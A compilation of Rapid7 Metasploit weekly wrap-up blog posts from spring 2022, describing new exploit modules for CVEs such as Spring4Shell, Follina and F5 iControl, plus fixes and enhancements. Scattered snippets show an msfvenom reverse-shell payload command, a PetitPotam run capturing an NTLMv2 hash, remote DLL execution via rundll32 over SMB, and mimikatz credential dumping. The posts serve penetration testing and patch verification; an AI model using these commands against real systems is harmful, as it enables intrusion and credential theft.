Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/06/17/metasploit-weekly-wrap-up-162/

vCenter Secret Extracter

Expanding on the work of the vcenter_forge_saml_token auxiliary module, community contributor npm-cesium137-io has added a new module for extracting the vmdir/vmafd certificates, the IdP keypair, the VMCA root cert, and anything from vmafd that has a private key associated, from an offline copy of the services database. This information can then be used with the vcenter_forge_saml_token module to gain a session cookie that grants access to the SSO domain as a vSphere administrator.

Great work by npm-cesium137-io to complete this exploit chain and provide users a full end to end solution to get administrative level privileges on a vCenter/vSphere server given an offline copy of the services database!

Named Pipe Pivoting Documentation Updates

Historically speaking named pipe pivoting has been an area of much confusion among users. We have taken note of this and thanks to some help from adfoster-r7 and bwatters-r7, we have added in some documentation for using named pipe pivoting with Windows Meterpreter.

You can find this documentation online on our documentation site at https://docs.metasploit.com/docs/using-metasploit/intermediate/pivoting-in-metasploit.html. Note that since with Metasploit 6.2 our documentation now lives inside of the Metasploit codebase, which you can find at docs/metasploit-framework.wiki/Pivoting-In-Metasploit.md.

Service Library Improvements

Community contributor kalidor noticed that whilst testing a few modules that the Windows Services library we maintain was in need of some updates and was erroring out for him in a number of cases. This turned out to be due to some inappropriately thrown exceptions. After further consultation it was decided a rewrite of the code was needed which not only solved the original issue but also aligned the Windows Services library to more closely align with existing design patterns, ensuring it will be easier to maintain long term.

New module content (1)

• VMware vCenter Extract Secrets from vmdir / vmafd DB File by npm – This module extracts the vmdir / vmafd certificates from an offline copy of the service database (i.e. a vCenter backup). Right now it will pull the IdP keypair, the VMCA root cert, and anything from vmafd that has a private key associated.

Enhancements and features (1)

• #16654 from adfoster-r7 – This PR adds documentation for using named pipe pivoting with Windows Meterpreter.

Bugs fixed (3)

• #16602 from kalidor – If a user restarted a service using lib/msf/core/post/windows/services.rb an exception would be thrown as a integer instead of as a string, which would cause an error to occur. This has been fixed by rewriting the code for the service_restart to use more appropriate logic. Additionally, the documentation has been updated for lib/msf/core/post/windows/services.rb to note which functions may throw exceptions.
• #16627 from bwatters-r7 – The tools/modules/update_payload_cached_sizes.rb script has been updated to contain additional exception handling to appropriately handle any exceptions that may be thrown during runs, and then print out a list of those exceptions at the end of the run.
• #16665 from adfoster-r7 – A missing import has been fixed in /tools/exploit/random_compile_c.rb, allowing it to now compile C files as expected.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.2.2…6.2.3
• Full diff 6.2.2…6.2.3

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2022/06/10/metasploit-weekly-wrap-up-161/

A Confluence of High-Profile Modules

This release features modules covering the Confluence remote code execution bug CVE-2022-26134 and the hotly-debated CVE-2022-30190, a file format vulnerability in the Windows Operating System accessible through malicious documents. Both have been all over the news, and we’re very happy to bring them to you so that you can verify mitigations and patches in your infrastructure. If you’d like to read more about these vulnerabilities, Rapid7 has AttackerKB analyses and blogs covering both Confluence CVE-2022-26134 (AttackerKB, Rapid7 Blog)and Windows CVE-2022-30190 (AttackKB, Rapid7 Blog).

Metasploit 6.2

While we release new content weekly (or in real-time if you are using github), we track milestones as well. This week, we released Metasploit 6.2, and it has a whole host of new functionality, exploits, and fixes

New module content (2)

• Atlassian Confluence Namespace OGNL Injection by Spencer McIntyre, Unknown, bturner-r7, and jbaines-r7, which exploits CVE-2022-26134 – This module exploits an OGNL injection in Atlassian Confluence servers (CVE-2022-26134). A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.
• Microsoft Office Word MSDTJS by mekhalleh (RAMELLA Sébastien) and nao sec, which exploits CVE-2022-30190 – This PR adds a module supporting CVE-2022-30190 (AKA Follina), a Windows file format vulnerability.

Enhancements and features (2)

• #16651 from red0xff – The test_vulnerable methods in the various SQL injection libraries have been updated so that they will now use the specified encoder if one is specified, ensuring that characters are appropriately encoded as needed.
• #16661 from dismantl – The impersonate_ssl module has been enhanced to allow it to add Subject Alternative Names (SAN) fields to the generated SSL certificate.

Bugs fixed (4)

• #16615 from NikitaKovaljov – A bug has been fixed in the IPv6 library when creating solicited-multicast addresses by finding leading zeros in last 16 bits of link-local address and removing them.
• #16630 from zeroSteiner – The auxiliary/server/capture/smb module no longer stores duplicate Net-NTLM hashes in the database.
• #16643 from ojasookert – The exploits/multi/http/php_fpm_rce module has been updated to be compatible with Ruby 3.0 changes.
• #16653 from adfoster-r7 – :
  This PR fixes an issue where named pipe pivots failed to establish the named pipes in intermediate connections.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.2.1…6.2.2
• Full diff 6.2.1…6.2.2

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2022/06/03/metasploit-weekly-wrap-up-160/

Ask and you may receive

Module suggestions for the win, this week we see a new module written by jheysel-r7 based on CVE-2022-26352 that happens to have been suggested by jvoisin in the issue queue last month. This module targets an arbitrary file upload in dotCMS versions before 22.03, 5.3.8.10, and 21.06.7 to obtain shells. Make sure you have covered your bases for permission to target this vulnerability before testing this as one blog post suggests some banking sites may rely on this tool.

Everything comes full circle

As the GSoC 2022 program starts to ramp up, a contributor that participated in 2020, red0xff, contributed an enhancement to SQLi library support to give module writers a quicker path to injection on Microsoft SQL. The enhancement updates the auxiliary/gather/billquick_txtid_sqli module to showcase library utility and can reduce logic code required in modules significantly—saving about 20% in this one instance.

New module content (2)

• DotCMS RCE via Arbitrary File Upload by Hussein Daher, Shubham Shah, and jheysel-r7, which exploits CVE-2022-26352 – Adds an exploit module that leverages CVE-2022-26352, an arbitrary file upload vulnerability in dotCMS versions before 22.03, 5.3.8.10, and 21.06.7, that allows an attacker to execute arbitrary code remotely in the context of the user running the application. The module uploads a .jsp payload to the tomcat ROOT directory and accesses it to trigger its execution.
• MyBB Admin Control Code Injection RCE by Altelus, Christophe De La Fuente, and Cillian Collins, which exploits CVE-2022-24734 – Adds an exploit module that leverages an improper input validation vulnerability in MyBB prior to 1.8.30 to execute arbitrary code in the context of the user running the application. Authentication to the MyBB Admin Control is required for this exploit to work and the account must have rights to add or update settings.

Enhancements and features (2)

• #16435 from red0xff – This adds support for Microsoft SQL Server to the SQL injection library. Additionally, this updates the auxiliary/gather/billquick_txtid_sqli module to leverage the new library features for exploitation.
• #16492 from h00die – Improves the nfs_mount scanner module by detecting if a NFS network share is mountable or not based on the provided IP address and hostname.

Bugs fixed (2)

• #16621 from sjanusz-r7 – Fixes a bug where running multi/manage/shell_to_meterpreter to upgrade from a Python Meterpreter session to a Native Meterpreter session would kill the original Meterpreter session.
• #16640 from zeroSteiner – A bug has been fixed where the Net::LDAP library would fail due to the socket returning less data than was requested. This was addressed by introducing a custom read() method to appropriately handle cases where the socket may return less data than was expected.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.2.0…6.2.1
• Full diff 6.2.0…6.2.1

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/05/27/metasploit-weekly-wrap-up-158-2/

PetitPotam Improvements

Metasploit’s Ruby support has been updated to allow anonymous authentication to SMB servers. This is notably useful while exploiting the PetitPotam vulnerability with Metasploit, which can be used to coerce a Domain Controller to send an authentication attempt over SMB to other machines via MS-EFSRPC methods:

msf6 auxiliary(scanner/dcerpc/petitpotam) > run 192.168.159.10

[*] 192.168.159.10:445    - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445    - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcOpenFileRaw

[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.159.10
[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:768ec6a80487d57b:c5bae280991f0814f92bbbd5cce710df:0101000000000000806cc79fb364d801fed140b07186c36f000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f005500500007000800806cc79fb364d80106000400020000000800300030000000000000000000000000400000ee85f088ff3d462c936ca209ddc2cc835a9df7261cf96264158f81bf31035a980a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100350039002e003100320038000000000000000000

[+] 192.168.159.10:445    - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >

Full details can be found in the Metasploit PetitPotam documentation.

Standalone SMB Server tool

Our very own Spencer McIntyre has added support for creating a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB 1/2/3, as well as encryption support for SMB3.

Example usage:

ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point .

This can be useful for copying files onto remote targets, or running remote DLLs:

copy \\192.168.123.1\home\example.txt .

rundll32.exe \\192.168.123.1\home\example.dll,0

Local Exploit suggester improvements

The post/multi/recon/local_exploit_suggester module is a post-exploitation module which iterates through multiple relevant Metasploit modules and automatically checks for local vulnerabilities that may lead to privilege escalation.

This module has been updated with a number of bug fixes, as well as having the UX has been improved to more clearly highlight which modules are viable:

msf6 post(multi/recon/local_exploit_suggester) > run session=-1
... etc ...
[*] ::1 - Valid modules for session 3:
============================
 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                 Yes                      The target is vulnerable.
 2   exploit/linux/local/cve_2022_0847_dirtypipe                         Yes                      The target appears to be vulnerable. Linux kernel version found: 5.14.0
 3   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.
 4   exploit/linux/local/desktop_privilege_escalation                    Yes                      The target is vulnerable.
 5   exploit/linux/local/network_manager_vpnc_username_priv_esc          Yes                      The service is running, but could not be validated.
 6   exploit/linux/local/pkexec                                          Yes                      The service is running, but could not be validated.
 7   exploit/linux/local/polkit_dbus_auth_bypass                         Yes                      The service is running, but could not be validated. Detected polkit framework version 0.105.
 8   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 9   exploit/android/local/futex_requeue                                 No                       The check raised an exception.
 10  exploit/linux/local/abrt_raceabrt_priv_esc                          No                       The target is not exploitable.
 11  exploit/linux/local/abrt_sosreport_priv_esc                         No                       The target is not exploitable.
 12  exploit/linux/local/af_packet_chocobo_root_priv_esc                 No                       The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable
 13  exploit/linux/local/af_packet_packet_set_ring_priv_esc              No                       The target is not exploitable.
 14  exploit/linux/local/apport_abrt_chroot_priv_esc                     No                       The target is not exploitable.
 15  exploit/linux/local/asan_suid_executable_priv_esc                   No                       The check raised an exception.
 16  exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc          No                       The target is not exploitable.

Setting the option verbose=true will now also highlight modules that weren’t considered as part of the module suggestion phase – due to session platform/arch/type mismatches. This is useful for evaluating modules which may require manually migrating from a Shell session to Meterpreter, or from a Python Meterpreter to a Native Meterpreter to gain local privilege escalation etc.

New module content (1)

• #16488 from cdelafuente-r7 – This updates the exploit/windows/local/vss_persistence and post/windows/manage/persistence_exe modules to optionally obfuscate scheduled tasks. Additionally, the post/windows/manage/persistence_exe was updated with a new "TASK" startup technique that allows users to obtain persistence via a scheduled task.

Enhancements and features (7)

• #16413 from sjanusz-r7 – Updates the multi/recon/local_exploit_suggester with multiple enhancements, including the ability to correctly work with Java/Python Meterpreters as well as now generating a readable table of results.
• #16481 from zeroSteiner – This updates the Msf::Exploit::Remote::SMB::Server::Share mixin to use RubySMB, which now supports SMB versions 1-3, along with various other features like accounting, state logging, session tracking, support for multiple files etc. All existing modules that were using this mixin will now automatically benefit from these improvements. They will work again against modern versions of Windows where SMBv1 has been disabled.
• #16518 from adfoster-r7 – Merge Metasploit framework wiki into Metasploit framework.
• #16600 from adfoster-r7 – Update docs site to use migrated wiki files.
• #16610 from zeroSteiner – Updates the module windows/dcerpc/cve_2021_1675_printnightmare from being an auxiliary that would require the user to setup and configure an external Samba share to host the payload to an all-inclusive exploit. This means users can deliver their payloads in a seamless fashion without needing to deal with Samba.
• #16620 from zeroSteiner – Adds a standalone tool for creating a read-only SMB 2/3 server from the current working directory. Usage: ruby ./tools/smb_file_server.rb. Normal SMB clients can then connect to this share and download files as normal. For instance via Windows with copy \\192.168.123.1\home\example.exe . or net use \\192.168.123.1\home /u:WORKGROUP\metasploit password

Bugs fixed (1)

• #16619 from NikitaKovaljov – This fixes a bug in neighbor advertisement filtering as used by the auxiliary/scanner/discover/ipv6_neighbor module. Prior to this patch, the module would fail to map IPv4 to IPv6 addresses.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.43…6.2.0
• Full diff 6.1.43…6.2.0

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2022/05/20/metasploit-weekly-wrap-up-157/

Zyxel firewall unauthenticated command injection

This week, our very own Jake Baines added an exploit module that leverages CVE-2022-30525, an unauthenticated remote command injection vulnerability in Zyxel firewalls with zero touch provisioning (ZTP) support. Jake is also the author of the original research and advisory that was published last week. This module allows an attacker to achieve arbitrary code execution as the nobody user on affected devices. It takes advantage of an unsanitized user input that feeds the python os.system method behind the scenes. Well done Jake!

SAML credentials generator for vCenter Server

Community contributor npm-cesium137-io added an auxiliary module that forges valid SAML credentials for vCenter server. These credentials are very useful since they can be used to gain access to the SSO domain as a vSphere administrator. Note that this module cannot run offline and must be executed while the target vCenter is reachable over the network to properly acquire the administrator session token. Also, the vCenter SSO Identity Provider (IdP) trusted certificate chain needs to be provided. This can be extracted manually from the vmdir database file at /storage/db/vmware-vmdir/data.mdb using binwalk or using this post module, which is still in review at the time of writing.

GSOC 2022

The Metasploit project was accepted again for the Google Summer of Code program. This year the team welcomes back pingport80 as a returning contributor and 3V3RYONE. These students will be working on Post API improvements and expanded HTTP-Trace support respectively. We look forward to mentoring and working with them in the coming months, so stay tuned for further updates as they get started!

New module content (3)

• VMware vCenter Forge SAML Authentication Credentials by npm – This module forges valid SAML credentials for vCenter server using the vCenter SSO IdP certificate, IdP private key, and VMCA root certificate as input objects.
• Zyxel Firewall ZTP Unauthenticated Command Injection by jbaines-r7, which exploits CVE-2022-30525 – A new module has been added to exploit CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the nobody user.
• Bookmarked Sites Retriever by jerrelgordon – This adds a module to retrieve the bookmarks from Internet Explorer, Opera, Google Chrome, and Edge.

Enhancements and features (3)

• #16430 from adfoster-r7 – This adds support for logging AS-REP Roastable accounts, as well as storing the generated Kerberos token within the creds database. Additionally improves error handling.
• #16442 from sjanusz-r7 – This adds a new vars_form_data field to the Rex HTTP Client for uploading files/form values to a remote HTTP server with ease:

vars_form_data = [
  { 'name' => 'nsp', 'data' => @csrf_token },
  { 'name' => 'upload', 'data' => 1 },
  { 'name' => 'MAX_FILE_SIZE', 'data' => 1000000 },
  { 'name' => 'uploadedfile', 'data' => payload_zip, 'mime_type' => 'application/zip', 'encoding' => 'binary', 'filename' => zip_filename }
]

res = send_request_cgi(
  'method' => 'POST',
  'uri' => uri,
  'vars_form_data' => vars_form_data
)

• #16555 from zeroSteiner – This moves a duplicated retry_until_truthy function into a centralized location for better reuse. This function is useful for retrying operations that may fail the first time, such as checking if Kubernetes containers are ready yet etc.

Bugs fixed (6)

• #16487 from red0xff – This fixes a deprecation warning in the auxiliary/capture/server/mssql warning as well as outputting a valid John The Ripper format for offline password cracking
• #16499 from adfoster-r7 – This fixes an issue where SSL connections made by Metasploit would fail when the Server Name Indicator (SNI) extension was in use.
• #16505 from AdrianVollmer – This fixes an issue in the auxiliary/scanner/lotus/lotus_domino_hashes #dump_hashes parsing logic.
• #16570 from ssst0n3 – This fixes a bug in the generation of aarch64 stagers so that when the stage is received and written to memory, the stage can execute in a lower-privileged process.
• #16572 from zeroSteiner – A bug has been fixed whereby a PayloadSpaceViolation exception might be raised when the --smallest flag was used with msfvenom, due to msfvenom setting the space available to 0 instead of a positive number. The code should now appropriately account for this case.
• #16588 from zeroSteiner – This adds a check to the two new Powershell adapter payload modules. The size check intends to ensure that payloads that are too large (like unstaged Meterpreters) are marked as incompatible.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.42…6.1.43
• Full diff 6.1.42…6.1.43

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2022/05/13/metasploit-weekly-wrap-up-156/

Spring4Shell module

Community contributor vleminator added a new module which exploits CVE-2022-22965—more commonly known as "Spring4Shell." Depending on its deployment configuration, Java Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older can be vulnerable to unauthenticated remote code execution.

F5 BIG-IP iControl RCE via REST Authentication Bypass module

In addition, we have a new module that targets F5 iControl and exploits CVE-2022-1388, from contributor heyder. This vulnerability allows attackers to bypass iControl’s REST authentication on affected versions and achieve unauthenticated remote code execution as root via the /mgmt/tm/util/bash endpoint.

Cisco RV340 SSL VPN RCE module

The last of the new RCE modules this week—community contributor pedrib added a Cisco RV340 SSL VPN module, which exploits CVE-2022-20699. This module exploits a stack buffer overflow in the default configuration of Cisco RV series routers, and does not require authentication. This module also works over the internet and does not require local network access.

First Class PowerShell Command Payloads

Metasploit has had the ability to execute native 64-bit and 32-bit Windows payloads for quite some time. This functionality was exposed to module authors by way of a mixin which meant that a dedicated target needed to be written. This placed an additional development burden on module authors who wanted to offer powershell commands for in-memory code execution of native payloads. Now module authors can just define the standard command target, and users can select one of the new cmd/windows/powershell* payloads. The new adapter will convert the native code into a powershell command automatically, without additional effort from the module developer.

Since these are new payload modules, they can also be generated directly using MSFVenom:

./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128

This is similar to using one of the psh- formatters with the existing -f option. However, because it’s a payload module, the additional Powershell specific options are accessible. For example, the resulting command can be base64-encoded to remove many special characters by setting Powershell::encode_final_payload=true.

New module content (4)

• F5 BIG-IP iControl RCE via REST Authentication Bypass by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits CVE-2022-1388 – A new module has been added for CVE-2022-1388, a vulnerability in F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions. By making a special request, one can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the root user on affected systems.
• Cisco RV340 SSL VPN RCE from pedrib, which exploits CVE-2022-20699 – A new module has been added which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the root user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.
• Spring Framework Class property RCE (Spring4Shell) by vleminator, which exploits CVE-2022-22965 – This adds a module that targets CVE-2022-22965, a remote code execution vulnerability in some installations of Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older. To be vulnerable, the application must be running on JDK 9+ and in this case, packaged and deployed as a war file, though it may be possible to bypass these limitations later.
• Powershell Command Adapter from zeroSteiner – This adds a new payload adapter for converting native x86 and x64 Windows payloads to command payloads using Powershell.

Enhancements and features (4)

• #16529 from dwelch-r7 – This updates Mettle payloads to support logging to file and now uses the same options as the other Meterpreters. For example within msfconsole:

use osx/x64/meterpreter_reverse_tcp
generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt'
to_handler

• #16538 from adfoster-r7 – The Python Meterpreter loader library has been updated to address deprecation warnings that were showing when running these payloads using Python 3.4 and later.
• #16551 from adfoster-r7 – The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.
• #16553 from mauvehed – This updates Metasploit’s .github/SECURITY.md file with the latest steps to follow when raising security issues with Rapid7’s open source projects.

Bugs fixed (8)

• #16485 from jeffmcjunkin – This updates the version check for the exploit/windows/local/s4u_persistence module to allow it to run on later Windows versions.
• #16491 from adfoster-r7 – This fixes a bug whereby Meterpreter sessions and modules would crash when encountering a timeout issue due to using an invalid or deprecated error name.
• #16531 from adfoster-r7 – This fixes a crash in various pihole modules when login authentication is required.
• #16533 from cdelafuente-r7 – This updates the Meterpreter reg command to correctly handle setting the KEY_WOW64 flag with -w 32 or -w 64 – previously these flag values were unintentionally ignored.
• #16540 from adfoster-r7 – This fixes an issue with Zeitwerk trying to load Go packages as part of the boot up process.
• #16542 from sjanusz-r7 – This fixes a bug in msfconsole’s internal book keeping to ensure that closed channels are no longer tracked.
• #16544 from adfoster-r7 – This updates post module windows/gather/ad_to_sqlite to no longer crash. The module will now additionally store the extracted information as loot.
• #16560 from Ronni3X – This updates the nessus_connect login functionality to correctly handle the @ symbol being present in the password.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.41…6.1.42
• Full diff 6.1.41…6.1.42

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/05/06/metasploit-wrap-up-154/

VMware Workspace ONE Access RCE

Community contributor wvu has developed a new Metasploit Module which exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) in VMware Workspace ONE Access, to execute shell commands as the ‘horizon’ user. This module has a CVSSv3 base score of 9.8, and a full technical analysis can be found on the official Rapid7 Analysis

WSO2 Arbitrary File Upload to RCE

Our very own Jack Hysel has contributed a new module for CVE-2022-29464. Multiple WSO2 products are vulnerable to an unrestricted file upload vulnerability that results in RCE. This module builds a java/meterpreter/reverse_tcp payload inside a WAR file and uploads it to the target via the vulnerable file upload. It then executes the payload to open a session. A full technical analysis can be found on the official Rapid7 Analysis

Kiwi Meterpreter Updates – Windows 11 Support

The Meterpreter Kiwi extension has been updated to pull in the latest changes from the upstream mimikatz project. Notably this adds support for Windows 11 when running the creds_all command within a Meterpreter console:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi…
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
Success.
meterpreter > sysinfo
Computer        : WIN11-TEST
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : TESTINGDOMAIN
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username     Domain         NTLM                           SHA1
--------     ------         ----                           ----
WIN11-TEST$  TESTINGDOMAIN  a133becebb8e22321dbf26bf8d90f398  dbf0ad587f62004306f435903fb3a516da6ba104
... etc etc ...

New module content (3)

• VMware Workspace ONE Access CVE-2022-22954 by wvu, Udhaya Prakash, and mr_me, which exploits CVE-2022-22954 – This adds an exploit for CVE-2022-22954 which is an unauthenticated RCE in VMWare Workspace ONE Access.
• WSO2 Arbitrary File Upload to RCE by wvu, Jack Heysel, Orange Tsai, and hakivvi, which exploits CVE-2022-29464 – This adds an exploit for CVE-2022-29464 which is an arbitrary file upload vulnerability in multiple WSO2 products that can be used to obtain remote code execution.
• ZoneMinder Language Settings Remote Code Execution by krastanoel, which exploits CVE-2022-29806 – This leverages a directory traversal and arbitrary file write in vulnerable versions of ZoneMinder to achieve remote code execution as the www-data user.

Enhancements and features (2)

• #16445 from dwelch-r7 – The Windows Meterpreter payload now supports a MeterpreterDebugLogging datastore option for logging debug information to a file. Example usage:

use windows/x64/meterpreter_reverse_tcp
set MeterpreterDebugBuild true
set MeterpreterDebugLogging rpath:C:/test/foo.txt
save
generate -f exe -o shell.exe
to_handler

• #16462 from bcoles – Adds support for armle/aarch64 architectures to gdb_server_exec

Bugs fixed (2)

• #16526 from jheysel-r7 – The version of Meterpreter Payloads has been upgraded to pull in a fix that will ensure that the Kiwi extension can now work properly on Windows 11 hosts and correctly dump credentials vs failing silently as it was doing previously.
• #16530 from sjanusz-r7 – This updates the pihole_remove_commands_lpe module to no longer break sessions when running the check method.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.40…6.1.41
• Full diff 6.1.40…6.1.41

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Shelby Pace original https://blog.rapid7.com/2022/04/29/metasploit-wrap-up-153/

Redis Sandbox Escape

Our very own Jake Baines wrote a module that performs a sandbox escape on Redis versions between 5.0.0 and 6.1.0 and achieves remote code execution as the redis user. Redis installations can be password protected, so this module supports exploiting the vulnerability with and without authentication.

While this module targets Redis software, the vulnerability (CVE-2022-0543) only presents itself on Debian-based Linux distributions due to the Lua package interface remaining enabled. The existence of the Lua package interface means that arbitrary libraries can be loaded and used to evade the protections of the sandbox. This vulnerability has been reported as being exploited in the wild.

Antivirus Enumeration

Thanks to sempervictus we now have a post module for enumerating installed antivirus products on Windows systems. Using either a Meterpreter or shell session, the module detects these installations through WMI queries and saves the information to the database. Some of the data returned includes versioning information, possibly clueing a user in on a potential next target for privilege escalation.

New module content (2)

• Redis Lua Sandbox Escape by Reginaldo Silva and jbaines-r7, which exploits CVE-2022-0543 – This exploit achieves remote code execution as the redis user via a sandbox escape in several Redis versions distributed through Debian-based Linux distributions.
• Windows Installed AntiVirus Enumeration by rageltman – This adds a module that enumerates all installed AV products on Windows.

Enhancements and features (1)

• #16486 from adfoster-r7 – This adds an initial set of pen testing docs to https://docs.metasploit.com/docs/pentesting/

Bugs fixed (2)

• #16450 from ORelio – This updates exploit/multi/vnc/vnc_keyboard_exec to include a delay that increases reliability when getting a shell and typing out long commands.
• #16509 from adfoster-r7 – This ensures proper escaping of HTML in code blocks that are produced by the info -d command.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.39…6.1.40
• Full diff 6.1.39…6.1.40

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/04/22/https-www-rapid7-com-blog-post-2022-04-01-metasploit-weekly-wrap-up-158/

ManageEngine ADSelfService Plus Authenticated RCE

This module is pretty exciting for us because it’s for a vulnerability discovered by our very own Rapid7 researchers Jake Baines, Hernan Diaz, Andrew Iwamaye, and Dan Kelly.
The vulnerability allowed for attackers to leverage the "custom script" functionality to execute arbitrary operating system commands whenever domain users reset their passwords.
I won’t go into too much depth though because we have a whole blog post here for you to check out with all the details!
Oh, and I almost forgot to mention this module comes with a brand new jjs_reverse_tcp payload too.

Who watches the watch_queue?

This week we’ve also brought you an LPE for Linux via the watch_queue event notification system.
The module exploits a heap out-of-bounds write in kernel memory in versions prior to 5.18 but keep in mind the module currently only has the appropriate offsets for Ubuntu 20.10 with kernel version 5.13.0-37.

New module content (2)

• Watch Queue Out of Bounds Write by Jann Horn, bonfee, and bwatters-r7, which exploits CVE-2022-0995
• ManageEngine ADSelfService Plus Custom Script Execution by Andrew Iwamaye, Dan Kelley, Hernan Diaz, and Jake Baines, which exploits CVE-2022-28810 – This adds an exploit for CVE-2022-28810 which is an authenticated RCE in ManageEngine ADSelfService Plus.

Enhancements and features (6)

• #16437 from h00die – Adds ESXi as a recognizable type on ssh_login.
• #16438 from h00die – Some SMTP servers only give out credentials when prompted. Now, the module option ‘AUTHPROMPT’ exists to indicate whether or not the auth prompt is required by the server.
• #16446 from zeroSteiner – This updates the code for compatibility with the latest RubySMB 3.1 gem.
• #16458 from bcoles – The fortios_vpnssl_traversal_creds_leak module has been updated to appropriately attribute the original discoverers of the vulnerability and to credit their original blog post and research presentations.
• #16476 from bcoles – The tools/dev/msftidy.rb tool has been updated to recommend using CVE datastore references over the cve.mitre.org URL references since this is more maintainable in the long run and will assist transitioning things when CVE transitions to cve.org later this year.
